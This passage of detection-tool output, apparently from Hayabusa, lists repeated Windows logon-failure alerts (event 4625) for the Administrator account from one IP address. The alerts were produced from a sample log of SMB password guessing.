Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 
